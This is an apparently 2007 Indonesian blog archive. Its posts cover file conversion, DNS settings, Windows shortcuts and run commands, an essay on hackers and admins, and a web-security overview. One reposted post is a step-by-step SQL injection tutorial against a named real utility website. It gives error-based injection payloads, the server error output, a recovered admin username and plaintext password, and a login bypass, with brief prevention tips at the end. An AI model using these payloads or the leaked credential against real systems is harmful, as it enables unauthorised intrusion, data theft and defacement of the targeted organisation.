PDF (Portable Document Format) adalah salah satu type file yang populer saat ini, PDF terutama sering kita temui pada ebook-ebook. Mengapa PDF banyak disukai, terutama oleh pengguna internet. Selain mempunyai system proteksi yang cukup ampuh, PDF juga multiplatform. Artinya PDF bisa tidak tergantung pada satu jenis platfor saja. PDF bisa digunakan oleh pengguna Windows, UNIX, Linux, Machintos dan beberapa platform lainnya.
Bagi kita yang sudah terbiasa menggunakan Windows mungkin masih agak asing dengan file type PDF ini, namun jika kita sering menggunakan internet dan mendownload ebook, pasti sudah tidak asing lagi dengan type file ini. Bagaimana sebenarnya file PDF ini dibuat ? Untuk membuat file PDF ini ada beberapa jenis software yang bisa digunakan, salah satu diantaranya adalah Adobe Acrobat Distiller.
Adobe Acrobat Distiller bekerja seperti printer, namun tidak mencetak ke kertas atau media cetak lainnya. Melainkan Adobe Acrobat Distiller mencetak atau mengkonversi hasil cetakan menjadi file. Cara menggunakan Adobe Acrobat Distiller juga sangat mudah, misalnya jika kita ingin mengkonversi file bertype DOC (MS Word) ke type PDF kita memerintahkan program MS Word untuk melakukan pencetakan (Print), dan memilih Adobe Acrobat Distiller sebagai printernya.
Konversi Secara Online
Itu jika kita mempunyai software dan menginstallnya di PC, namun bagaimana jika kita tidak punya softwarenya. Alternatif yang bisa kita gunakan adalah mengkonversinya menggunakan fasilitas Online Convertion. Yaitu kita menggunakan fasilitas yang disediakan oleh website yang memberikan jasa mengkonversi berbagai type file. Salah satu website yang menyediakan jasa ini adalah Zamzar.com.
Zamzar.com bukan hanya menyediakan fasilitas untuk mengkonversi atau membuat file PDF saja, Zamzar.com juga menyediakan konversi berbagai type file. Diantaranya:
* csv - Comma Separated Values,
* doc - Microsoft Word Document,
* docx - Microsoft Word 2007 Document,
* odp - OpenDocument presentation,
* ods - OpenDocument spreadsheet,
* odt - OpenDocument Text Document,
* pdf - Portable Document Format,
* ppt - Microsoft PowerPoint Presentation,
* ps - Postscript document,
* rtf - Rich Text Format,
* wpd - Wordperfect Document,
* wps - Microsoft Works Document,
* xls - Microsoft Excel Spreadsheet.
Selain itu Zamzar.com juga menyediakan fasilitas untuk mengkonversi file-file image diantaranya:
* bmp - Windows bitmap
* gif - Compuserve graphics interchange
* jpg - JPEG compliant image
* pcx - PC Paintbrush Bitmap Graphic
* png - Portable Network Graphic
* tga - Truevision Targa Graphic
* tiff - Tagged image file format
* wbmp - Wireless Bitmap File Format
Mengkonversi file-file audio diantaranya:
* ac3 - AC3 Audio File
* flac - Free Lossless Audio Codec
* m4a - MPEG-4 Video File
* mp3 - Compressed audio file
* mp4 - MPEG-4 Video File
* ogg - Ogg Vorbis Compressed Audio File
* wav - Windows audio file
* wma - Windows media file
Mengkonversi file-file Video diantaranya:
* aac - Advanced Audio Coding File
* ac3 - AC3 Audio File
* avi - Windows video file
* flac - Free Lossless Audio Codec
* flv - Flash Video
* ipod - MPEG-4 Video File
* mov - Apple QuickTime Movie
* mp3 - Compressed audio file
* mp4 - MPEG-4 Video File
* mpg - Moving Picture Experts Group File
* ogg - Ogg Vorbis Compressed Audio File
* wav - Windows audio file
Cara mengkonversi file melalui Zamzar.com juga sangat mudah, kita tinggal mengkuti langkah-langkah yang telah disediakan oleh Zamzar.com. 1) pilih file yang akan dikonversi, 2) pilih type file hasil konversi yang diinginkan, 3) masukkan alamat email yang valid pada kota yang disediakan, 4) klik tombol Convert. File hasil konversi akan dikirimkan melalui alamat email yang diinputkan.
Image Hosted by ImageShack.us
Jadi kita tidak perlu bingung lagi jika ingin mengkonversi berbagai type file, tapi tidak mempunyai software untuk mengkonversinya. Kita bisa menggunakan Zamzar.com untuk berbagai keperluan tersebut.
Rabu, 26 September 2007
Mengkonversi Type File
Memahami Kerja DNS dan setting DNS
Apa itu DNS:
DNS singkatan dari Domain Name System, DNS secara bodhon merupakan suatu tools dalam jaringan yang digunakan untuk menterjemahkan dari nama domain ke ip address.
Mengapa ada DNS?
Komputer pada dasarnya tidak bisa membaca domain (nama komputer) dalam bahasa manusia seperti yahoo.com, google.com dll. Sedangkan yang di baca oleh komputer adalah bahasa mesin, yang berupa digital atau angka (202.162.135.135, 222.124.24.91). Untuk itu perlu pemetaan antara bahasa yang digunakan manusia ke bahasa mesin.
Bagaimana mekanismenya?
Mekanismenya adalah, ketika komputer kita (selaku DNS Client) memanggil sebuah host lain (misal http://yahoo.com) maka komputer kita akan segera menanyakan ke Server DNS yang telah kita pasang di konfigurasi jaringan kita. Jika server DNS kita tahu (ada catatan tentang domain tertentu) maka kita akan segera dipanggilkan dengan nomer IP yang bersangkutan. Jika server DNS kita tidak tahu, maka server DNS kita akan menanyakan pada server DNS yang lebih atas lagi dan seterusnya. Jika tidak diketemukan, maka dinyatakan bahwa host tidak diketemukan.
Bagaimana setting DNS Client?
Di Windows tinggal klik
Start
Setting
Network Connection
The image “http://geocities.com/bimosaurus/dns1.jpg” cannot be displayed, because it contains errors.
Gambar 1. Langkah 1
. Akan muncul gambar seperti berikut
The image “http://geocities.com/bimosaurus/dns2.jpg” cannot be displayed, because it contains errors.
Gambar 2. Langkah 2
Kemudian pada Icon Network Connectionnya di klik kanan Pilih Properties Seperti di dalam gambar yang di tampilkan dibawah
The image “http://geocities.com/bimosaurus/dns3.jpg” cannot be displayed, because it contains errors.
Gambar 3. Langkah 3
The image “http://geocities.com/bimosaurus/dns4.jpg” cannot be displayed, because it contains errors.
Gambar 4. Network Properties
The image “http://geocities.com/bimosaurus/dns5.jpg” cannot be displayed, because it contains errors.
Gambar 5. Network Configuration
Set lah DNS pada server DNS yang ada dalam jaringan anda, jika tak tahu, tanya ke administrator
Windows ShortCut
Windows system key combinations
• F1: Help
• CTRL+ESC: Open Start menu
• ALT+TAB: Switch between open programs
• ALT+F4: Quit program
• SHIFT+DELETE: Delete item permanently
Windows program key combinations
• CTRL+C: Copy
• CTRL+X: Cut
• CTRL+V: Paste
• CTRL+Z: Undo
• CTRL+B: Bold
• CTRL+U: Underline
• CTRL+I: Italic
Mouse click/keyboard modifier combinations for shell objects
• SHIFT+right click: Displays a shortcut menu containing alternative commands
• SHIFT+double click: Runs the alternate default command (the second item on the menu)
• ALT+double click: Displays properties
• SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin
General keyboard-only commands
• F1: Starts Windows Help
• F10: Activates menu bar options
• SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object
• CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item)
• CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
• ALT+DOWN ARROW: Opens a drop-down list box
• ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
• SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
• ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
• ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
• CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
• ALT+underlined letter in menu: Opens the menu
• ALT+F4: Closes the current window
• CTRL+F4: Closes the current Multiple Document Interface (MDI) window
• ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)
Shell objects and general folder/Windows Explorer shortcuts
For a selected object:
• F2: Rename object
• F3: Find all files
• CTRL+X: Cut
• CTRL+C: Copy
• CTRL+V: Paste
• SHIFT+DELETE: Delete selection immediately, without moving the item to the Recycle Bin
• ALT+ENTER: Open the properties for the selected object
To copy a file
Press and hold down the CTRL key while you drag the file to another folder.
To create a shortcut
Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.
General folder/shortcut control
• F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
• F5: Refreshes the current window.
• F6: Moves among panes in Windows Explorer
• CTRL+G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
• CTRL+Z: Undo the last command
• CTRL+A: Select all the items in the current window
• BACKSPACE: Switch to the parent folder
• SHIFT+click+Close button: For folders, close the current folder plus all parent folders
Windows Explorer tree control
• Numeric Keypad *: Expands everything under the current selection
• Numeric Keypad +: Expands the current selection
• Numeric Keypad -: Collapses the current selection.
• RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child
• LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent
Properties control
• CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs
Accessibility shortcuts
• Press SHIFT five times: Toggles StickyKeys on and off
• Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off
• Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off
• Left ALT+left SHIFT+NUM LOCK: Toggles MouseKeys on and off
• Left ALT+left SHIFT+PRINT SCREEN: Toggles high contrast on and off
Microsoft Natural Keyboard keys
• Windows Logo: Start menu
• Windows Logo+R: Run dialog box
• Windows Logo+M: Minimize all
• SHIFT+Windows Logo+M: Undo minimize all
• Windows Logo+F1: Help
• Windows Logo+E: Windows Explorer
• Windows Logo+F: Find files or folders
• Windows Logo+D: Minimizes all open windows and displays the desktop
• CTRL+Windows Logo+F: Find computer
• CTRL+Windows Logo+TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
• Windows Logo+TAB: Cycle through taskbar buttons
• Windows Logo+Break: System Properties dialog box
• Application key: Displays a shortcut menu for the selected item
Microsoft Natural Keyboard with IntelliType software installed
• Windows Logo+L: Log off Windows
• Windows Logo+P: Starts Print Manager
• Windows Logo+C: Opens Control Panel
• Windows Logo+V: Starts Clipboard
• Windows Logo+K: Opens Keyboard Properties dialog box
• Windows Logo+I: Opens Mouse Properties dialog box
• Windows Logo+A: Starts Accessibility Options (if installed)
• Windows Logo+SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys
• Windows Logo+S: Toggles CAPS LOCK on and off
Dialog box keyboard commands
• TAB: Move to the next control in the dialog box
• SHIFT+TAB: Move to the previous control in the dialog box
• SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
• ENTER: Equivalent to clicking the selected button (the button with the outline)
• ESC: Equivalent to clicking the Cancel button
• ALT+underlined letter in dialog box item: Move to the corresponding item
Senin, 10 September 2007
Hacker disudut pandang Admin
Hacker adalah musuh-------------------Yah, benar hacker adalah musuh utama bagi seorang administrator.
Sebab mereka kadang kala menyebabkan banyak sekali kesulitan bagi seorang admin.
Kadang kala kerjaan seorang admin dari sekedar untuk memaintenance network menjadi harus menambal bolong2 network mereka dan harus memperbaiki apa yang salah dengan network mereka.
Belum lagi kasus dimana data - data pengguna jaringan mereka dirusak, dicuri, ataupun dirubah oleh hacker ini.
Menjadi seorang admin adalah tidak mudah, selain dia harus mengetahui dan mengerti dengan betul konsep jaringan, dia juga harus mempunyai kemampuan untuk memperbaiki kesalahan - kesalahan tidak diketahui pada jaringan mereka.
[ Tentunya jika dia adalah seorang admin yang baik ;p ].
Akan tetapi terkadang kala ada juga admin yang kerjaannya hanya memantau jaringan milik dia, tanpa memikirkan urusan - urusan mengenai kesalahan - kesalahan tersebut, mereka kadang kala hanya memikirkan " Ah bodoh amat, kerja gue kan cumen memaintenance network, ngak ada urusan dengan unknwon error ataupun hacker - hacker itu ".
Nah tipe admin yang beginilah yang mengganggap hacker itu adalah musuh mereka, sebab hacker itu menambah beban kerja mereka. Hacker hanya merusak jaringan mereka.
Admin tersebut harus menambah lagi waktu kerja mereka dari dulunya yang bisa dipergunakan untuk bersantai ria.
Tapi apakah betul hacker itu adalah seorang pengacau...
Hacker adalah teman-------------------Yah, benar hacker adalah seorang teman bagi seorang administrator.
Mereka membuat gairah bekerja seorang administrator kembali hidup, mereka membantu untuk memperkuat jaringan mereka.
Seorang admin yang menganggap seorang hacker adalah teman, merupakan tipe seorang admin yang berdedikasi tinggi.
Mengapa ?Sebab admin tersebut tidak memikirkan beban pekerjaan yang harus mereka tanggung, melainkan mereka memikirkan bahwa inilah yang saat yang sudah mereka tunggu - tunggu, sesuatu yang membuat pekerjaan mereka tidak membosankan.
Mereka bisa tahu apa kelemahan jaringan mereka, dan setelah tahu apa kelemahan jaringan mereka, mereka akan memperbaikinya.
Pernahkah anda merasakan betapa senangnya melakukan suatu hal yang benar - benar anda sukai dan anda kuasai ???Jika pernah, itulah perasaan yang sama yang dirasakan oleh tipe admin seperti itu.
Mereka mengganggap hacker bukanlah sebagai musuh atau beban mereka, melainkan menganggap mereka sebagai teman dan rekan seperjuangan yang patut dihargai.
Kesimpulan---------- - Jadi, Anda menganggap hacker sebagai apa?
SQL Injection, step by step
SQL Injection, step by step
By D-and
Published: April 25, 2007
/*********************************************************
* SQL Injection, step by step.
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.
Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja....
Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )
Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
Perintah run command windows xp
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (If Installed)*
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab Preselected)
control color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control folders
Fonts
control fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
IP Configuration (Display Connection Configuration)
ipconfig /all
IP Configuration (Display DNS Cache Contents)
ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)
ipconfig /flushdns
IP Configuration (Release All Connections)
ipconfig /release
IP Configuration (Renew All Connections)
ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)
ipconfig /registerdns
IP Configuration (Display DHCP Class ID)
ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)
ipconfig /setclassid
ava Control Panel (If Installed)
jpicpl32.cpl
Java Control Panel (If Installed)
javaws
Keyboard Properties
control keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Mcft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control mouse
Mouse Properties
main.cpl
Network Connections
control netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Notepad
notepad
Nview Desktop Manager (If Installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (If Installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Remote Desktop
mstsc
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility (Scan Immediately)
sfc /scannow
System File Checker Utility (Scan Once At Next Boot)
sfc /scanonce
System File Checker Utility (Scan On Every Boot)
sfc /scanboot
System File Checker Utility (Return to Default Setting)
sfc /revert
System File Checker Utility (Purge File Cache)
sfc /purgecache
System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write
Security
Saat ini, Firewall, Security Scanner, dan anti virus software hampir melindungi semua jaringan komputer di dalam suatu perusahaan.Walaupun dengan perlindungan tersebut, seorang hacker melakukan studi tersendiri, dan mempelajari cara lain untuk menembus, mengubah, dan mengambil data penting di dalam suatu perusahaan.
Dan sayangnya mereka menemukan cara lain tersebut untuk menembus keamanan data perusahaan, yakni melalui sebuah aplikasi Website perusahaan itu sendiri.
Aplikasi Website bisa di akses secara publik melalui internet, 24 jam sehari, 7 hari seminggu. Hal ini menyebabkan seorang hacker bisa melakukan percobaan hacking tanpa batas untuk menembus aplikasi website tersebut dengan tujuan yang bermacam-macam. ada yang semata-mata untuk menguji kemampuan hackingnya, ada yang bertujuan untuk mengubah, dan mengambil data penting , misalnya mengambil informasi data customer di perusahaan tersebut.
Pete Lindstrom, Seorang Director of Security Strategies with the Hurwitz Group mengatakan :
" Aplikasi website saat ini, adalah bagian dan struktur yang paling lemah di dalam suatu perusahaan".
Apa itu aplikasi website ?
- Aplikasi website adalah suatu aplikasi yang berada di dalam server suatu perusahaan, dimana setiap orang
bisa mengakses dan melihatnya melalui internet maupun intranet.
Aplikasi website terdiri dari 3 bagian aplikasi :
Bagian pertama adalah aplikasi browser, semacam : internet explorer, mozzila, firefox, opera, dan lain-lain.
Bagian kedua adalah aplikasi yang menghandle permintaan data ke server oleh browser tersebut, contohnya seperti : ASP ( active server pages ) , Java servlets, dan lain-lain.
Bagian ketiga : adalah database dari aplikasi website tersebut yang berfungsi sebagai penyedia data, dan juga penyimpan data atas permintaan dari aplikasi bagian kedua tadi.
Contoh-contoh Aplikasi website adalah : Shopping cart, Formulir order, halaman login, Forum, Blogs, dan lain-lain.
Modus Operandi, Bagaimana Hacker Menembus sistem keamanan website Anda.
Seorang hacker yang ingin melakukan serangan ke sebuah situs, mereka mempunyai tahap-tahap dalam melakukan hacking, modus operandi mereka selalu hampir sama. sebagian besar adalah :
1. Mengumpulkan Informasi.
ini adalah tahap awal untuk melakukan hacking, Hacker biasanya mengumpulkan informasi-informasi terhadap target terlebih dahulu, misalnya mencari informasi terhadap Operating System terhadap server target tersebut, apakah target memakai server berbasikan linux, atau window. Juga melakukan Port scanning pada website tersebut, untuk mengetahui port tersebut di gunakan untuk apa saja, dan port apa saja yang terbuka. lalu memeriksa aplikasi dari server tersebut.
misalnya apakah menggunakan PHP, atau CGI, atau ASP sebagai bahasa program untuk aplikasi situsnya.
2. Melakukan Survey
.
Jika sudah mendapatkan informasi-informasi tersebut di atas, hacker akan melakukan survey untuk mencari kelemahan terhadap informasi yang dia dapat tadi, apakah memiliki kelemahan atau tidak.
3. Memeriksa Input Validation.
Bila sudah di tahap ini, hacker akan melakukan uji coba atas input validation yang di gunakan website tersebut. dan mencari tahu, Input apa yang di butuhkan oleh server tersebut agar bisa melakukan perubahan.
4. Memulai Serangan.
Setelah mengumpulkan informasi terhadap situs target, maka hacker akan memulai serangannya.
Metode serangan favorit yang sering di lakukan oleh hacker
SQL Injection : Penyerang akan menjalankan perintah SQL melalui website tersebut, ini bisa di lakukan dengan dua cara, yakni melalui pengeditan Form , atau pun melalui pengeditan link url.
Cross site scripting ( CSS attack ) : Dengan serangan ini, Input yang di masukan pengguna lainnya dalam website tersebut akan di transfer ke website nya si penyerang.
Directory traversal Attack : Juga di kenal dengan ../ ( dot dot slash ) attack. Dengan serangan ini, directory yang tadinya tidak bisa di lihat ( forbiden ) akan bisa di akses. Dengan cara melakukan penambahan ../ di link target.
